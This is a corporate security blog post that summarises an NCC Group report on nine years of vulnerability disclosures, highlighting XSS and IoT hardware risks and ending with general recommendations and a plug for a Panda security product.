The tech industry moves at such a pace that, often, just as we are getting used to a trend, along come several more that have already taken its place. This is also the case when it comes to corporate cybersecurity: the variety of attacks and cybercrimes increases at a dizzying rate and mean that we need to constantly refresh our knowledge of the management of this type of risk.
However, at times it is the classics that best stand the test of time. For all the new ways of attacking a company or person’s cybersecurity, some traditional methods continue to stand out above the rest. This is what we can see the report Nine years of bugs & coordinated vulnerability disclosure: Trends, observations & recommendations for the future, written by NCC Group, who analyze the most common web vulnerabilities.
The danger of XSS
In the last nine years, the most frequent bug on websites the world over has been the vulnerability XSS (Cross-site Scripting), which makes up 18% of the bugs found. This kind of security flaw allows cybercriminals to insert a series of malicious scripts into websites, which they can then use to steal users’ cookies, or even access their logins on a private portal.
The danger posed by XSS is double, since it doesn’t just allow the theft of user data and information— something that many other vulnerabilities set out to achieve. With XSS there is an added factor: the attacker commits these crimes on websites that, in the user’s eye, should be fully trustworthy, and so they aren’t concerned about this kind of theft taking place.
The danger is in hardware too
But the potential cybersecurity risks aren’t just in software. According to the NCC Group report, hardware infrastructure is also exposed to a growing number of vulnerabilities, both at home and in the workplace.
And among these new risks associated with hardware is an especially noteworthy case: Internet of Things (IoT) devices. As well as forming part of a booming industry, they are exposed to an increase in cyberattacks that is much more significant than that seen in any other tech industry.
The key: cybersecurity for hardware and software
Beyond simple figures, the report forces us to ask ourselves several questions. How is it possible that we are still exposed to so many corporate cybersecurity risks? And, more importantly, how can a vulnerability like XSS, which has been around for almost two decades, still represent one of the largest security problems on websites around the world? The answers aren’t simple, but the conclusions are: every company needs to improve their cybersecurity both in terms of software development and in hardware production.
To do so, they must do everything possible to minimize the risks that could be exposed to.
1.- Investment. All large companies invest vast sums of money in the development of their software. But not all of them follow suit when it comes to establishing the channels to check the security of this software. It’s vital that these checks are as important as the development itself, and that they have a specific budget.
2.- Communication. Communication streams in the case of possible vulnerabilities must be as quick as possible. What’s more, they need to be multi-directional: towards developers, towards employees, towards the company’s providers… On the other hand, the reports on cybersecurity bugs must also be communicated and managed quickly and efficiently.
3.- Hardware security Hardware devices are still one of the main gateways for malicious software. This is why companies must also invest in appropriate hardware in order to minimize risks. Security cables for laptops or U2F keys will play an important role when it comes to protecting against cybercrime. It’s also important to have storage devices that contain several backups to which it is possible to turn in the event of any problems.
4.- Cybersecurity solutions. Virtually no large company can face the multiple risks of corporate cybersecurity by themselves. So, as a general rule, they must have external solutions. One example of these external solutions is Panda Adaptive Defense, which not only monitors all processes carried out by the company, but also prevents, detects, and remediates possible cybersecurity conflicts.
The facts, then, are clear. Despite the evolution and emergence of new vulnerabilities, some of the older ones are still very much present in the business environment. This means that companies must go further, both in software and in hardware, to protect their IT security.